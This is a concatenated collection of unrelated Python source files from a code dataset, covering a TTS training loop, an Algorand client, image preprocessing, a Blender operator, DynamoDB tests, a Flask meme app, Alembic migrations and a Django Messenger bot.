global_step\n generator.eval()\n losses_tot = []\n with torch.no_grad():\n for batch_idx, (x, x_lengths, y, y_lengths) in enumerate(val_loader):\n x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True)\n y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True)\n\n (z, z_m, z_logs, logdet, z_mask), (x_m, x_logs, x_mask, l_head_wt, l_qry_wt, l_attn_wt), (attn, logw, logw_) = generator(x, x_lengths, y, y_lengths, gen=False)\n l_mle = commons.mle_loss(z, z_m, z_logs, logdet, z_mask)\n l_length = commons.duration_loss(logw, logw_, x_lengths)\n\n loss_gs = [l_mle, l_length]\n loss_g = sum(loss_gs)\n\n if batch_idx == 0:\n losses_tot = loss_gs\n else:\n losses_tot = [x + y for (x, y) in zip(losses_tot, loss_gs)]\n\n if batch_idx % hps.train.log_interval == 0:\n logger.info('Eval Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(x), len(val_loader.dataset),\n 100. 
* batch_idx / len(val_loader),\n loss_gs[0].item()))\n logger.info([x.item() for x in loss_gs])\n \n \n losses_tot = [x/len(val_loader) for x in losses_tot]\n #loss_tot = sum(losses_tot)\n loss_tot = losses_tot[0]\n loss_val.append(loss_tot.detach())\n scalar_dict = {\"loss/g/total\": loss_tot}\n scalar_dict.update({\"loss/g/{}\".format(i): v for i, v in enumerate(losses_tot)})\n utils.summarize(\n writer=writer_eval,\n global_step=global_step, \n scalars=scalar_dict)\n logger.info('====> Epoch: {}'.format(epoch))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"118770026","text":"from algosdk.v2client import algod\r\nimport os\r\n\r\n\r\n# Setup HTTP client w/guest key provided by PureStake\r\nclass Connect:\r\n def __init__(self):\r\n # declaring the third party API\r\n self.algod_address = os.environ.get('PURESTAKE_URL')\r\n # <-----shortened - my personal API token\r\n self.algod_token = os.environ.get('PERSONAL_API_TOKEN_PURESTAKE')\r\n self.headers = {\"X-API-Key\": self.algod_token}\r\n\r\n def connectToNetwork(self):\r\n # establish connection\r\n return algod.AlgodClient(self.algod_token, self.algod_address, self.headers)\r\n\r\n\r\nconnect = Connect()\r\nalgo_client = connect.connectToNetwork()\r\nparams = algo_client.suggested_params()","sub_path":"connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"512640232","text":"from enum import Enum, auto\nimport cv2\nimport numpy as np\n\nclass ColorSpace(Enum):\n BGR = auto()\n RGB = auto()\n HSV = auto()\n GRAY = auto()\n\nclass ImagePreprocessor:\n def __init__(self, original_images, color=ColorSpace.BGR):\n # original images have bgr color space\n # original_images.shape is (image_num, height, width, channel)\n self.original_images = original_images\n self.color = ColorSpace.BGR\n if original_images.shape[3] != 3: # if gray\n self.color = ColorSpace.GRAY\n # size.shape is (width, height)\n def preprocess(self, size, color=None, do_normalize=True):\n images = self.__resize(self.original_images, size)\n \n if self.color == color:\n print(f'Already color space is {color}.')\n elif self.color == ColorSpace.GRAY: # if gray\n print('image color is gray')\n elif color is None:\n pass\n else:\n images = self.__cnvcolor(images, color)\n \n if do_normalize:\n images = self.__normalize(images)\n return images\n\n \n \n def threshold(self, size, color, thresholds):\n images = self.__resize(self.original_images, size)\n if self.color != color:\n images = self.__cnvcolor(images, color)\n str_color = str(color).split('.')[1]\n def _threshold(image):\n res = []\n for channel, image_one_channel in zip(str_color, cv2.split(image)):\n _, image_thresholded = cv2.threshold(image_one_channel, thresholds[channel], 255, cv2.THRESH_BINARY)\n res.append(np.expand_dims(image_thresholded, -1))\n # concatenate channel(e.g. 
r+g+b -> rgb)\n return np.concatenate(res, -1)\n \n return self.__normalize(np.array([_threshold(x) for x in images]))\n \n \n def __resize(self, images, size):\n return np.asarray([cv2.resize(x, size, interpolation=cv2.INTER_AREA) for x in images], dtype=np.float32)\n \n \n def __cnvcolor(self, images, color):\n if self.color == color:\n return images\n \n convert_enum = None\n \n if self.color == ColorSpace.BGR:\n if color == ColorSpace.RGB:\n convert_enum = cv2.COLOR_BGR2RGB\n elif color == ColorSpace.HSV:\n convert_enum = cv2.COLOR_BGR2HSV\n elif self.color == ColorSpace.RGB:\n if color == ColorSpace.BGR:\n convert_enum = cv2.COLOR_RGB2BGR\n elif color == ColorSpace.HSV:\n convert_enum = cv2.COLOR_RGB2HSV\n \n return np.array([cv2.cvtColor(x, convert_enum) for x in images])\n\n \n def __normalize(self, images):\n if len(images.shape) == 3:\n images = np.expand_dims(images, -1)\n \n normalized_images = np.empty_like(images)\n for i in range(images.shape[3]):\n max_val = np.max(images[:, :, :, i])\n normalized_images[:, :, :, i] = images[:, :, :, i] / max_val\n return normalized_images\n \n \n def normalize(self, images):\n return self.__normalize(images)\n \n \n","sub_path":"jscas_ai_challenge_2020_data/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"78733926","text":"import bpy\nfrom bpy.props import BoolProperty\n\n\n\ndef set_active_tool(tool_name):\n for area in bpy.context.screen.areas:\n if area.type == \"VIEW_3D\":\n override = bpy.context.copy()\n override[\"space_data\"] = area.spaces[0]\n override[\"area\"] = area\n bpy.ops.wm.tool_set_by_id(override, name=tool_name)\n \n\ndef TglCursor(oStartSnap,oEndSnap,oShowCursor):\n Scene = bpy.data.scenes['Scene']\n Snap = Scene.tool_settings.use_snap\n SnapElement = Scene.tool_settings.snap_elements\n Tra = Scene.transform_orientation_slots[0].type\n Pivot = Scene.tool_settings.transform_pivot_point\n ovl = bpy.context.space_data.overlay\n\n if Tra != 'CURSOR':\n set_active_tool(\"builtin.cursor\")\n Scene.transform_orientation_slots[0].type = 'CURSOR'\n ovl.show_cursor = True\n Scene.tool_settings.use_snap = oStartSnap\n Scene.tool_settings.snap_elements = {'VERTEX'}\n Scene.tool_settings.transform_pivot_point = 'CURSOR'\n else:\n Scene.transform_orientation_slots[0].type = 'GLOBAL'\n Scene.tool_settings.use_snap = oEndSnap\n Scene.tool_settings.transform_pivot_point = 'BOUNDING_BOX_CENTER'\n ovl.show_cursor = oShowCursor\n\nclass tglPivot_OT_object(bpy.types.Operator):\n bl_idname = \"view3d.toggle_pivot_mode\"\n bl_label = \"toggle pivot mode\"\n bl_description = \"toggle pivot mode\"\n bl_options = {'REGISTER', 'UNDO'} \n\n bSnap = BoolProperty(default=False, name = \"start Snap\", description = \"Corser Active Snap\")\n eSnap = BoolProperty(default=False, name = \"end Snap\", description = \"Finish Active Snap\")\n oShow = BoolProperty(default=True, name = \"Show Cursor\", description = \"Show cursor\")\n def execute(self, context,):\n\n TglCursor(self.bSnap,self.eSnap,self.oShow)\n\n return {'FINISHED'}\n","sub_path":"Tgl_Pivot.py","file_name":"Tgl_Pivot.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"116291843","text":"import unittest\nimport os\nimport sys\nimport boto3\nimport json\nsys.path.insert(0, './')\nimport add_cluster\nfrom moto import mock_dynamodb2\n\nclass 
TestAddCluster(unittest.TestCase):\n \"\"\"Testing for add_cluster.py\"\"\"\n\n @mock_dynamodb2\n def test_add_cluster(self):\n \"\"\"Setup DynamoDB tables for hyper-kube-config\n \"\"\"\n\n os.environ[\"DYNAMODB_TABLE_K8_CLUSTERS\"] = \"hyper-kube-config-test\"\n self.dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\n self.dynamodb.create_table(\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n },\n ],\n TableName='hyper-kube-config-test',\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 1,\n 'WriteCapacityUnits': 5\n },\n )\n self.hyper_kube_config_table = self.dynamodb.Table(os.environ[\"DYNAMODB_TABLE_K8_CLUSTERS\"])\n\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/add_cluster_test.py","file_name":"add_cluster_test.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"637604530","text":"import pprint\nimport logging\nfrom urllib.parse import unquote\n\nimport requests\nfrom flask import (Response, url_for, render_template, send_file,\n current_app, request)\n\nGITHUB_SLUG = \"jacebrowning/memegen\"\nGITHUB_BASE = \"https://raw.githubusercontent.com/{}/master/\".format(GITHUB_SLUG)\nCONTRIBUTING_URL = GITHUB_BASE + \"CONTRIBUTING.md\"\nCHANGES_URL = GITHUB_BASE + \"CHANGELOG.md\"\n\nlog = logging.getLogger(__name__)\n\n\ndef route(*args, **kwargs):\n \"\"\"Unquoted version of Flask's `url_for`.\"\"\"\n return unquote(url_for(*args, **kwargs))\n\n\ndef samples(blank=False):\n \"\"\"Generate dictionaries of sample image data for template rendering.\"\"\"\n for template in sorted(current_app.template_service.all()):\n path = \"_\" if blank else template.sample_path\n url = route('image.get', key=template.key, path=path)\n yield {\n 'key': template.key,\n 'name': template.name,\n 'url': url,\n }\n\n\ndef display(title, path, raw=False, mimetype='image/jpeg'):\n \"\"\"Render a webpage or raw image based on request.\"\"\"\n mimetypes = request.headers.get('Accept', \"\").split(',')\n browser = 'text/html' in mimetypes\n\n if browser:\n log.info(\"Rending image on page: %s\", request.url)\n html = render_template(\n 'image.html',\n src=request.url,\n title=title,\n ga_tid=get_tid(),\n )\n return html if raw else Response(html)\n\n else:\n log.info(\"Sending image: %s\", path)\n _track(title)\n return send_file(path, mimetype=mimetype)\n\n\ndef _track(title):\n \"\"\"Log the requested content, server-side.\"\"\"\n data = dict(\n v=1,\n tid=get_tid(),\n cid=request.remote_addr,\n\n t='event',\n ec='Image',\n ea='GET',\n el=str(title),\n\n uip=request.remote_addr,\n ua=request.user_agent.string,\n dr=request.referrer,\n )\n if get_tid(default=None):\n requests.post(\"http://www.google-analytics.com/collect\", data=data)\n else:\n log.debug(\"Analytics data:\\n%s\", pprint.pformat(data))\n\n\ndef get_tid(*, default='local'):\n \"\"\"Get the analtyics tracking identifier.\"\"\"\n return current_app.config['GOOGLE_ANALYTICS_TID'] or default\n","sub_path":"memegen/routes/_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"91497663","text":"\"\"\"cached_media_type_field\n\nRevision ID: 13c4ebad96ad\nRevises: b06a335b4faa\nCreate Date: 2018-05-20 20:45:04.180525\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision 
identifiers, used by Alembic.\nrevision = '13c4ebad96ad'\ndown_revision = 'b06a335b4faa'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('cached_media', sa.Column('type', sa.String(length=10), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('cached_media', 'type')\n # ### end Alembic commands ###\n","sub_path":"alembic/versions/13c4ebad96ad_cached_media_type_field.py","file_name":"13c4ebad96ad_cached_media_type_field.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"354395586","text":"__author__ = 'Rolando.Morales'\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt4.QtGui import *\r\nfrom PyQt4.QtCore import *\r\nfrom about import *\r\n\r\nclass VistaAbout(QDialog,Ui_Dialog):\r\n def __init__(self):\r\n super(VistaAbout,self).__init__()\r\n self.setupUi(self)\r\n self.setFixedHeight(532)\r\n self.setFixedWidth(458)\r\n\r\n\r\n\r\n","sub_path":"VistaAbout.py","file_name":"VistaAbout.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520830760","text":"from itertools import permutations\n\n\ndef is_same(seq_1: list, seq_2: list):\n for shift in range(len(seq_1)):\n if seq_2 == (seq_1[-shift:] + seq_1[: -shift]):\n return True\n return False\n\n\ndef generate_sequences(ones_num: int, digits_num: int):\n sequences = list()\n zeros_num = digits_num - ones_num\n for sequence in permutations([0] * zeros_num + [1] * ones_num):\n is_add = True\n for seq in sequences:\n if is_same(list(sequence), list(seq)):\n is_add = False\n break\n if is_add:\n sequences.append(sequence)\n return sequences\n\n\ndef find_axes(sequence: list):\n axes = list()\n len_ = len(sequence)\n seq = sequence\n mid = len_ // 2\n if len_ % 2 == 0:\n for shift in range(mid):\n if seq[1:mid] == seq[:mid:-1]:\n axes.append([shift, \"nodes\"])\n if seq[:mid] == seq[:mid - 1:-1]:\n axes.append([shift, \"middles\"])\n seq = seq[-1:] + seq[: -1]\n else:\n for shift in range(len_):\n if seq == seq[::-1]:\n axes.append([len_ - shift - 1, \"mid_node\"])\n seq = seq[-1:] + seq[: -1]\n return axes\n\n\ndef print_axes(sequence: list):\n axis_ = find_axes(sequence)\n for node_ in axis_:\n type_ = node_[1]\n node_1 = node_[0]\n with open(\"result.csv\", 'a') as file:\n if type_ == \"nodes\":\n node_2 = (node_1 + len(sequence) // 2) % len(sequence)\n for i in range(len(sequence)):\n node = sequence[i]\n if i is node_1 or i is node_2:\n file.write(f\"({node})\")\n else:\n file.write(f\"{node}\")\n file.write(\" \")\n if type_ == \"middles\":\n node_2 = (node_1 + len(sequence) // 2) % len(sequence)\n for i in range(len(sequence)):\n node = sequence[i]\n if i is node_1 or i is node_2:\n file.write(\"|\")\n file.write(f\"{node}\")\n file.write(\" \")\n if type_ == \"mid_node\":\n node_2 = (node_1 + 1 + len(sequence) // 2) % len(sequence)\n for i in range(len(sequence)):\n node = sequence[i]\n if i is node_2:\n file.write(f'({node})')\n else:\n file.write(f\"{node}\")\n if i is node_1:\n file.write(\"|\")\n file.write(\" \")\n\n\nwith open(\"result.csv\", 'w') as file:\n file.write(\"Num of digits,Num of ones,Classes\\n\")\nfor n in range(3, 10):\n for k in range(n + 1):\n combinations = generate_sequences(k, n)\n with open(\"result.csv\", 'a') as file:\n 
file.write(f\"n={n},k = {k},\")\n for sequence_ in combinations:\n print_axes(sequence_)\n with open(\"result.csv\", 'a') as file:\n file.write(f\"\\n\")\n","sub_path":"Antonov Aleksei/Symmetry/Symmetry.py","file_name":"Symmetry.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"386297506","text":"# coding=utf8\n\nimport re\n\n\ndef get_last_used_var(identifiers, previous_match=None, should_skip=None):\n if not should_skip:\n should_skip = lambda *_: False\n\n if previous_match:\n prev_var_match_found = False\n else:\n prev_var_match_found = True\n\n walked = {}\n for identifier_data in identifiers:\n (identifier, (line, column)) = identifier_data\n\n if should_skip(*identifier_data):\n continue\n\n if identifier in walked:\n continue\n\n if previous_match and identifier_data == previous_match:\n if previous_match[0] != identifier:\n return identifier_data\n\n if prev_var_match_found:\n return identifier_data\n\n walked[identifier] = True\n\n if previous_match == identifier_data:\n prev_var_match_found = True\n\n\ndef get_identifier_from_string(line, pattern, extract):\n matches = re.search(pattern, line)\n\n if not matches:\n return ('', 0)\n\n return extract(matches)\n\n\ndef get_identifier_under_cursor(\n buffer, cursor,\n pattern='([\\w.]+)$', extract=lambda m: (m.group(1), m.start(1))\n):\n (line_number, column_number) = cursor\n line = buffer[line_number-1][:column_number]\n identifier, start_at = get_identifier_from_string(line, pattern, extract)\n if identifier:\n return (identifier, (line_number, start_at + 1))\n else:\n return None\n\n\ndef get_possible_identifiers(\n buffer, cursor,\n pattern=r'([\\w.]+)(?![\\w.]*\\()',\n extract=lambda m: (m.group(1), m.start(1))\n):\n line_number, _ = cursor\n identifiers = []\n\n for line in reversed(buffer[:line_number]):\n line_number -= 1\n matches = re.finditer(pattern, line)\n\n if not matches:\n continue\n\n for match in reversed(list(matches)):\n identifier, start_at = extract(match)\n identifiers.append(\n (identifier, (line_number + 1, start_at + 1))\n )\n\n return identifiers\n\n\ndef get_defined_identifiers(\n buffer, cursor, pattern\n):\n line_number, _ = cursor\n identifiers = []\n\n for line in reversed(buffer[:line_number-1]):\n line_number -= 1\n matches = re.finditer(pattern, line)\n\n if not matches:\n continue\n\n for match in reversed(list(matches)):\n group_id = 1\n if not match.group(group_id):\n group_id = 2\n identifier = match.group(group_id)\n identifiers.append((identifier, (line_number, match.start(group_id)+1)))\n\n return identifiers\n\n\n\ndef get_higher_indent(buffer, cursor):\n line_number, _ = cursor\n\n current_indent, _ = get_indentation(buffer[line_number])\n for line in reversed(buffer[:line_number]):\n line_number -= 1\n if line == '':\n continue\n line_indent, _ = get_indentation(line)\n if current_indent > line_indent:\n return (line, line_number)\n\n return None\n\n\ndef match_higher_indent(buffer, cursor, pattern):\n line_number, _ = cursor\n while True:\n indent = get_higher_indent(buffer, (line_number, 0))\n if not indent:\n return\n line, line_number = indent\n if re.search(pattern, line.strip()):\n return indent\n\ndef match_exact_indent(buffer, cursor, amount, pattern):\n for line_number in range(cursor[0], len(buffer)):\n line = buffer[line_number]\n line_indent, _ = get_indentation(line)\n if line_indent != amount:\n continue\n if re.search(pattern, line):\n return (line_number, 0)\n\n return 
None\n\ndef get_indentation(line):\n indent = len(line) - len(line.lstrip())\n return indent, line[:indent]\n\n\ndef get_prev_nonempty_line(buffer, cursor_line):\n for line in reversed(buffer[:cursor_line]):\n if line.strip() == \"\":\n continue\n return line\n return \"\"\n\n\ndef ensure_newlines(buffer, line_number, amount):\n for line in reversed(buffer[:line_number]):\n if line != '':\n break\n\n if amount <= 0:\n break\n\n amount -= 1\n line_number -= 1\n\n return line_number, amount\n\ndef get_next_nonempty_line(buffer, cursor_line):\n cursor_line += 1\n for line in buffer[cursor_line:]:\n if line.strip() == \"\":\n cursor_line += 1\n continue\n return line, cursor_line\n return \"\", 0\n\ndef to_vim_cursor(cursor):\n return (cursor[0]+1, cursor[1]+1)\n\ndef from_vim_cursor(cursor):\n return (cursor[0]-1, cursor[1]-1)\n\ndef insert_lines_before(buffer, cursor, lines):\n buffer[cursor[0]:cursor[0]] = lines\n\n\ndef is_cursor_between(line, cursor, before, after):\n if not re.search(before, line[:cursor[1]+1]):\n return False\n\n if not re.search(after, line[cursor[1]:]):\n return False\n\n return True\n","sub_path":"pythonx/px/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"277088970","text":"import pandas as pd\nfrom sklearn.metrics import accuracy_score,f1_score,confusion_matrix\nimport numpy as np\nimport torch\nfrom sklearn import preprocessing\nimport torch.utils.data as Data\nimport models\nfrom nn import nn_test\nfrom ml import clf_train_test\nimport matplotlib.pyplot as plt\nimport itertools\nimport copy\nfrom pandas import DataFrame\nfrom itertools import combinations\n\nmodel_file = './data/model_gan.pkl'\nisnn = False\ndef main():\n data = pd.read_table('./data/diabetes.txt', sep=',')\n predictors = [f for f in data.columns if f not in ['Outcome']]\n X = np.array(data[predictors])\n Y = np.array(data['Outcome'])\n traincount = int(len(Y) * 0.6)\n scaler = preprocessing.MinMaxScaler()\n X = scaler.fit_transform(X)\n test_x = X[traincount:]\n test_y = Y[traincount:]\n ml_pred = clf_train_test(test_x, test_y, False)\n if isnn:\n X = torch.FloatTensor(X)\n Y = torch.LongTensor(Y)\n nn_test_x = X[traincount:]\n nn_test_y = Y[traincount:]\n test_dataset = Data.TensorDataset(nn_test_x, nn_test_y)\n testloader = Data.DataLoader(\n dataset=test_dataset,\n batch_size=1,\n shuffle=True,\n num_workers=2,\n )\n model = models.init_model(name='nn1')\n model.load_state_dict(torch.load(model_file))\n nn_pred = nn_test(testloader,model)\n ml_pred.append(nn_pred)\n\n pred = np.array(ml_pred)\n\n # bestmodel(0,2,5,6,7)('et','svc','xgb','lgbm','catboost')\n c_all = pred[0] + pred[2] + pred[5]+ pred[6] + pred[7]\n c_all = np.where(c_all > 2.5, 1, 0)\n accuracy = accuracy_score(c_all, test_y)\n f1 = f1_score(c_all, test_y)\n cm = confusion_matrix(c_all, test_y)\n print('c_all accuracy:', accuracy)\n print('c_all f1:', f1)\n class_names = ['样本0', '样本1']\n plot_confusion_matrix(cm,class_names,normalize=True,title='模型融合(GAN)')\n\n# 混淆矩阵绘制\ndef plot_confusion_matrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n plt.rcParams['font.sans-serif'] = ['SimHei']\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks 
= np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('真实样本')\n plt.xlabel('预测样本')\n plt.show()\n\n # for c in combinations(pred, 3):\n # c_all = c[0]+c[1]+c[2]\n # c_all = np.where(c_all > 1.5, 1, 0)\n # accuracy = accuracy_score(c_all, test_y)\n # f1 = f1_score(c_all, test_y)\n #\n # for x in c:\n # for i in range(len(pred)):\n # if (np.array(x) == pred[i]).all():\n # print(i)\n #\n # print(' accuracy:', accuracy)\n # print('f1:', f1)\n #\n # for c in combinations(pred, 5):\n # c_all = c[0]+c[1]+c[2]+c[3]+c[4]\n # c_all = np.where(c_all > 2.5, 1, 0)\n # accuracy = accuracy_score(c_all, test_y)\n # f1 = f1_score(c_all, test_y)\n #\n # for x in c:\n # for i in range(len(pred)):\n # if (np.array(x) == pred[i]).all():\n # print(i)\n #\n # print(' accuracy:', accuracy)\n # print('f1:', f1)\n #\n # for c in combinations(pred, 7):\n # c_all = c[0]+c[1]+c[2]+c[3]+c[4]+c[5]+c[6]\n # c_all = np.where(c_all > 3.5, 1, 0)\n # accuracy = accuracy_score(c_all, test_y)\n # f1 = f1_score(c_all, test_y)\n #\n # for x in c:\n # for i in range(len(pred)):\n # if (np.array(x) == pred[i]).all():\n # print(i)\n #\n # print(' accuracy:', accuracy)\n # print('f1:', f1)\n\nif __name__=='__main__':\n main()\n\n","sub_path":"MLClass/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534817771","text":"\"\"\"empty message\n\nRevision ID: d397e23ee861\nRevises: 6efae7b1c2f5\nCreate Date: 2020-07-21 00:53:57.195159\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd397e23ee861'\ndown_revision = '6efae7b1c2f5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('seeking_description', sa.String(length=500), nullable=True))\n op.add_column('Venue', sa.Column('seeking_talent', sa.Boolean(), nullable=True))\n op.execute('UPDATE \"Venue\" SET seeking_talent=False WHERE seeking_description IS NULL')\n op.alter_column('Venue','seeking_talent',nullable=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('Venue', 'seeking_talent')\n op.drop_column('Venue', 'seeking_description')\n # ### end Alembic commands ###\n","sub_path":"projects/01_fyyur/starter_code/migrations/versions/d397e23ee861_.py","file_name":"d397e23ee861_.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441385151","text":"import csv\n\nfile = open('./1_questions.csv', 'a')\n\nwith open('0_questions.csv', 'rb') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n for row in spamreader:\n if row[1] == '?':\n row[1] = \"%s or %s ?\" % (row[2], row[3])\n file.write(','.join(row))\n file.write(\"\\n\")\n\n","sub_path":"data/s0_set_question_text.py","file_name":"s0_set_question_text.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61522002","text":"#!/usr/bin/python3\n\"\"\"Modulo 3-Square\n\nthis module define a class Square with a method area\n\n\"\"\"\n\n\nclass Square():\n \"\"\"Empty class Square\n\n this is an empty class that define an square\n\n __size:\n the size of the square as integer.\n\n _position:\n The position of the square, since the current position of the cursor, as\n a tuple of two integers.\n (x , y)\n __ __ __ x\n |\n |\n |\n y\n\n \"\"\"\n\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"Constructor of the class\n\n Args:\n size (int): the initial size of the square, can't be negative\n position (int, int): the initial position of the square,\n cant be negatives\n \"\"\"\n self.size = size\n self.position = position\n\n def area(self):\n \"\"\"Calculate and retrun the area of the square based in its size\"\"\"\n\n return (self.__size**2)\n\n @property\n def size(self):\n \"\"\"returns the size of the Square\"\"\"\n\n return self.__size\n\n @size.setter\n def size(self, value):\n \"\"\"set the size of the Square\n Args:\n value (int): the initial size of the square, can't be negative\n \"\"\"\n\n if type(value) != int:\n raise TypeError(\"size must be an integer\")\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = value\n\n @property\n def position(self):\n \"\"\"return the value of the position of the square\"\"\"\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"set the value of the position of the square\n\n Args:\n value (int, int): the initial position of the square,\n cant be negatives\n \"\"\"\n if (type(value) != tuple or\n len(value) != 2 or\n type(value[0]) != int or\n value[0] < 0 or\n type(value[1]) != int or\n value[1] < 0):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n self.__position = value\n\n def my_print(self):\n \"\"\"prints the Square with # symbols\"\"\"\n\n if self.__size == 0:\n print()\n else:\n print('\\n' * self.__position[1], end='')\n for i in range(self.__size):\n print(' ' * self.__position[0], end='')\n print('#' * self.__size)\n","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"49414893","text":"import employee\r\n\r\ndef main():\r\n #Create empty list to hold the entry\r\n entry = []\r\n \r\n #Create loop to ask user input 3 persons information\r\n for count in range(0, 3):\r\n name = input('Enter name: ')\r\n id_num = input('Enter ID Number: ')\r\n dept = input('Enter Department: ')\r\n title 
= input('Enter Title: ')\r\n\r\n #cearte entry\r\n entry.append(employee.Employee(name, id_num, dept, title))\r\n print()\r\n \r\n for info in entry:\r\n print(info)\r\n print()\r\nmain()\r\n\r\n","sub_path":"Chap 10/Exercises/employee_ex.py","file_name":"employee_ex.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403641865","text":"import json\nimport os\nimport requests\n\nfrom django.http.response import HttpResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import generic\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom vbl_api import VBLInterface\n\nVBL_URL = 'http://vblcb.wisseq.eu/VBLCB_WebService/data/'\n\nACCESS_TOKEN = os.environ.get('ACCESS_TOKEN', None)\nFACEBOOK_URL = os.environ.get('FACEBOOK_URL', None)\nVERIFY_TOKEN = os.environ.get('VERIFY_TOKEN', None)\n\n\nclass MessengerBotView(generic.View):\n def get(self, request, *args, **kwargs):\n if self.request.GET.get('hub.verify_token', False) == VERIFY_TOKEN:\n return HttpResponse(self.request.GET['hub.challenge'])\n else:\n return HttpResponse('Error, invalid token')\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return generic.View.dispatch(self, request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n incoming_message = json.loads(self.request.body.decode('utf-8'))\n for entry in incoming_message['entry']:\n for message in entry['messaging']:\n if 'message' in message:\n fb_id = message['sender']['id']\n response = self.create_response(message['message']['text'])\n return self.send_message(fb_id, response)\n return HttpResponse()\n\n def create_response(self, message):\n return 'Your message: %s' % message\n vbl_interface = VBLInterface()\n\n if 'team' in message:\n return vbl_interface.response_team_data(message)\n\n if 'club' in message:\n return vbl_interface.response_club_data(message)\n\n return 'Please provide keywords team or club in your message.'\n\n def send_message(self, fb_id, message):\n post_message_url = '%s?access_token=%s' % (FACEBOOK_URL, ACCESS_TOKEN)\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n # Send a response to the client.\n values = {\n \"recipient\": {\"id\": fb_id},\n \"message\": {\"text\": message}\n }\n requests.post(post_message_url, headers=headers, data=json.dumps(values))\n\n\ndef home(request):\n vbl_interface = VBLInterface()\n club_teams = vbl_interface.response_club_data('club BBC As ')\n # return HttpResponse(json.dumps(club_teams), content_type=\"application/json\")\n\n my_team = find_team_from_club(club_teams, 'BBC As HSE A')\n team_guid = my_team['guid']\n team_data = load_team_data(team_guid)[0]\n team_competitions = team_data['poules']\n\n my_competition = find_competition_from_team(team_competitions, '3e Provinciale Heren Limburg B')\n competition_guid = my_competition['guid']\n competition_data = 